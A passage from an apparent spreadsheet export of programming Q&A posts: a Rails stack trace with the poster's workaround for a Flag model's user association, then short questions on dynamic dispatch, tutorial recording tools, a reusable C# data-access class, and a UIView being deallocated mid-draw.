/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_proxy.rb:209:in `method_missing'
app/views/admin/list_flagged.html.erb:65
app/views/admin/list_flagged.html.erb:61
app/views/admin/list_flagged.html.erb:24:in `each'
app/views/admin/list_flagged.html.erb:24
app/views/admin/list_flagged.html.erb:14
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:142:in `create_time_zone_conversion_attribute?'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:75:in `define_attribute_methods'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:71:in `each'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:71:in `define_attribute_methods'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:350:in `respond_to?'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_proxy.rb:209:in `method_missing'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_collection.rb:359:in `method_missing_without_paginate'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_proxy.rb:212:in `method_missing'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_proxy.rb:212:in `each'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_proxy.rb:212:in `send'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_proxy.rb:212:in `method_missing'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_collection.rb:359:in `method_missing_without_paginate'
/usr/lib/ruby/gems/1.8/gems/mislav-will_paginate-2.3.6/lib/will_paginate/finder.rb:167:in `method_missing'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/helpers/form_helper.rb:313:in `fields_for'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/helpers/form_helper.rb:253:in `form_for'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/renderable.rb:39:in `send'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/renderable.rb:39:in `render'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/template.rb:73:in `render_template'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/base.rb:256:in `render'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/base.rb:367:in `_render_with_layout'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/base.rb:254:in `render'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:1174:in `render_for_file'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:896:in `render_without_benchmark'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/benchmarking.rb:51:in `render'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/benchmarking.rb:51:in `render'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:868:in `render_without_benchmark'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/benchmarking.rb:51:in `render'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/benchmarking.rb:51:in `render'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:1248:in `default_render'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:1254:in `perform_action_without_filters'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/filters.rb:617:in `call_filters'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/filters.rb:610:in `perform_action_without_benchmark'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
/usr/lib/ruby/1.8/benchmark.rb:293:in `measure'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/rescue.rb:136:in `perform_action_without_caching'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/caching/sql_cache.rb:13:in `perform_action'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/connection_adapters/abstract/query_cache.rb:34:in `cache'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/query_cache.rb:8:in `cache'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/caching/sql_cache.rb:12:in `perform_action'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:524:in `send'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:524:in `process_without_filters'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/filters.rb:606:in `process_without_session_management_support'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/session_management.rb:134:in `process'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:392:in `process'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:183:in `handle_request'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:110:in `dispatch_unlocked'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:123:in `dispatch'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:122:in `synchronize'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:122:in `dispatch'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:132:in `dispatch_cgi'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:39:in `dispatch'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/rails.rb:76:in `process'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/rails.rb:74:in `synchronize'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/rails.rb:74:in `process'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:159:in `process_client'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:158:in `each'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:158:in `process_client'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:285:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:285:in `initialize'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:285:in `new'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:285:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:268:in `initialize'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:268:in `new'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:268:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/configurator.rb:282:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/configurator.rb:281:in `each'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/configurator.rb:281:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/bin/mongrel_rails:128:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/command.rb:212:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/bin/mongrel_rails:281
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:142:in `load_without_new_constant_marking'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:142:in `load'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:521:in `new_constants_in'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:142:in `load'
/usr/lib/ruby/gems/1.8/gems/rails-2.2.2/lib/commands/servers/mongrel.rb:64
/usr/local/lib/site_ruby/1.8/rubygems/custom_require.rb:31:in `gem_original_require'
/usr/local/lib/site_ruby/1.8/rubygems/custom_require.rb:31:in `require'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:153:in `require'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:521:in `new_constants_in'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:153:in `require'
/usr/lib/ruby/gems/1.8/gems/rails-2.2.2/lib/commands/server.rb:49
/usr/local/lib/site_ruby/1.8/rubygems/custom_require.rb:31:in `gem_original_require'
/usr/local/lib/site_ruby/1.8/rubygems/custom_require.rb:31:in `require'
script/server:3
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:142:in `create_time_zone_conversion_attribute?'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:75:in `define_attribute_methods'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:71:in `each'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:71:in `define_attribute_methods'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:350:in `respond_to?'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_proxy.rb:209:in `method_missing'
app/views/admin/list_flagged.html.erb:65
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_collection.rb:359:in `method_missing_without_paginate'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_proxy.rb:212:in `method_missing'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_proxy.rb:212:in `each'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_proxy.rb:212:in `send'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_proxy.rb:212:in `method_missing'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/associations/association_collection.rb:359:in `method_missing_without_paginate'
/usr/lib/ruby/gems/1.8/gems/mislav-will_paginate-2.3.6/lib/will_paginate/finder.rb:167:in `method_missing'
app/views/admin/list_flagged.html.erb:61
app/views/admin/list_flagged.html.erb:24:in `each'
app/views/admin/list_flagged.html.erb:24
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/helpers/form_helper.rb:313:in `fields_for'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/helpers/form_helper.rb:253:in `form_for'
app/views/admin/list_flagged.html.erb:14
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/renderable.rb:39:in `send'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/renderable.rb:39:in `render'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/template.rb:73:in `render_template'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/base.rb:256:in `render'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/base.rb:367:in `_render_with_layout'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_view/base.rb:254:in `render'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:1174:in `render_for_file'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:896:in `render_without_benchmark'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/benchmarking.rb:51:in `render'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/benchmarking.rb:51:in `render'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:868:in `render_without_benchmark'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/benchmarking.rb:51:in `render'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/benchmarking.rb:51:in `render'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:1248:in `default_render'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:1254:in `perform_action_without_filters'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/filters.rb:617:in `call_filters'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/filters.rb:610:in `perform_action_without_benchmark'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
/usr/lib/ruby/1.8/benchmark.rb:293:in `measure'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/rescue.rb:136:in `perform_action_without_caching'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/caching/sql_cache.rb:13:in `perform_action'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/connection_adapters/abstract/query_cache.rb:34:in `cache'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/query_cache.rb:8:in `cache'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/caching/sql_cache.rb:12:in `perform_action'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:524:in `send'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:524:in `process_without_filters'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/filters.rb:606:in `process_without_session_management_support'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/session_management.rb:134:in `process'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/base.rb:392:in `process'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:183:in `handle_request'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:110:in `dispatch_unlocked'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:123:in `dispatch'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:122:in `synchronize'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:122:in `dispatch'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:132:in `dispatch_cgi'
/usr/lib/ruby/gems/1.8/gems/actionpack-2.2.2/lib/action_controller/dispatcher.rb:39:in `dispatch'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/rails.rb:76:in `process'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/rails.rb:74:in `synchronize'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/rails.rb:74:in `process'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:159:in `process_client'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:158:in `each'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:158:in `process_client'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:285:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:285:in `initialize'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:285:in `new'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:285:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:268:in `initialize'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:268:in `new'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel.rb:268:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/configurator.rb:282:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/configurator.rb:281:in `each'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/configurator.rb:281:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/bin/mongrel_rails:128:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/lib/mongrel/command.rb:212:in `run'
/usr/lib/ruby/gems/1.8/gems/mongrel-1.1.5/bin/mongrel_rails:281
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:142:in `load_without_new_constant_marking'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:142:in `load'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:521:in `new_constants_in'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:142:in `load'
/usr/lib/ruby/gems/1.8/gems/rails-2.2.2/lib/commands/servers/mongrel.rb:64
/usr/local/lib/site_ruby/1.8/rubygems/custom_require.rb:31:in `gem_original_require'
/usr/local/lib/site_ruby/1.8/rubygems/custom_require.rb:31:in `require'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:153:in `require'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:521:in `new_constants_in'
/usr/lib/ruby/gems/1.8/gems/activesupport-2.2.2/lib/active_support/dependencies.rb:153:in `require'
/usr/lib/ruby/gems/1.8/gems/rails-2.2.2/lib/commands/server.rb:49
/usr/local/lib/site_ruby/1.8/rubygems/custom_require.rb:31:in `gem_original_require'
/usr/local/lib/site_ruby/1.8/rubygems/custom_require.rb:31:in `require'
script/server:3
Request
Parameters:
None
Show session dump
--- 
:user_id: 1
:last_page: http://localhost:3000/
flash: !map:ActionController::Flash::FlashHash {}
Response
Headers:
{"cookie"=&amp;gt;[],
 "Content-Type"=&amp;gt;"text/html",
 "Cache-Control"=&amp;gt;"no-cache"}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;--EDIT #2--&lt;/p&gt;
&lt;p&gt;Well, I've "fixed" it. Despite the fact that there is a belongs_to relation in the Flag model, I added the following code to the Flag model from acts_as_flaggable:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def user
  User.find(self.user_id)
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code does allow the page to load without error whether it is the first time on the page or the Nth.&lt;/p&gt;
&lt;p&gt;I would have added this as an answer, but I don't know that I am satisfied with this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamic dispatch and binding</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are dynamic dispatch and dynamic binding the same thing?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;Maciej&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tools for programming tutorials?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I engage in lot of training sessions and I would like to create video tutorials of all my sessions so that I can distribute it. What are the best Windows-based tools to add my PowerPoint slides, notes, voice and video (tutorials of code I write) and compile them into one video?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating a class to use for populating drop-down lists, grids, etc., in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Please keep in mind that I'm new to C# and OOP so I apologize in advance if this seems like an easy question to some.  I'm going back through my code and looking for ways to objectify repetitive code and create a class for it so that I can simply reuse the class.  That being said, I'm not looking to learn NHibernate or any other ORM just yet.  I'm not even looking to learn LINQ.  I want to hack through this to learn.&lt;/p&gt;
&lt;p&gt;Basically I use the same bit of code to access my database and populate a drop-down list with the values that I get.  An example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   protected void LoadSchools()
    {
        SqlDataReader reader;
        var connectionString = ConfigurationManager.ConnectionStrings["MyConnectionString"].ConnectionString;
        var conn = new SqlConnection(connectionString);
        var comm = new SqlCommand("SELECT * FROM [Schools] ORDER BY [SchoolName] ASC", conn);
        try
        {
            conn.Open();
            reader = comm.ExecuteReader();
            cmbEditSchool.DataSource = reader;
            cmbEditSchool.DataBind();
            cmbEditSchool.Text = "Please select an existing school to edit...";
            if (reader != null) reader.Close();
        }
        finally
        {
            conn.Dispose();
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I use this same bit of code, over and over again throughout my program, on different pages.  Most often, I'm populating a drop-down list or combo box, but sometimes I will populate a gridview, only slightly altering the query.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;My question is how can I create a class that will allow me to call a stored procedure&lt;/strong&gt;, instead of manually using queries like my example, and populate my different controls?  Is it possible to do with only 1 method?  I only need to start with selects.  I've been reading up on IEnumerable which seems like the appropriate interface to use, but how do I use it?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Edited to add:&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I marked Rorschach's answer as THE answer because s/he addressed my IEnumerable question.  I also understand the need for a proper DAL and perhaps BLL layer.  What I was trying to get to was that.  I can build a DAL using datasets and table adapters which, in the end, gets me a strongly typed dataset.  However, I feel a bit removed from the code.  I was after a straight-forward way of building the DAL myself starting with the code that I gave above.  Perhaps I'm not wording my question, or what I'm after, correctly.&lt;/p&gt;
&lt;p&gt;At any rate, Rorschach came closest to answering my actual question.  Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to avoid errors when releasing an object while code is still running?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a UIView subclass that draws itself when &lt;code&gt;-drawRect:&lt;/code&gt; is called.  It only takes a moment, but under extreme circumstances, such as low memory and deletion of the instance when going to another view controller, the draw function doesn't complete before the the object is deallocated.&lt;/p&gt;
&lt;p&gt;How am I supposed to deal with this issue?  The deallocation causes any calls to [self ...] to throw a EXC_BAD_ACCESS, which the drawing funct